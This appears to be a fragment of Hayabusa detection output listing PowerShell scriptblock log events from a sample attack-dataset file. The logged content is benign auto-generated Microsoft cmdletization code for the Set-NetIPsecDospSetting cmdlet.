$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterEx",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"emptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [Cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"emptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [Cmdlet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Binding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( 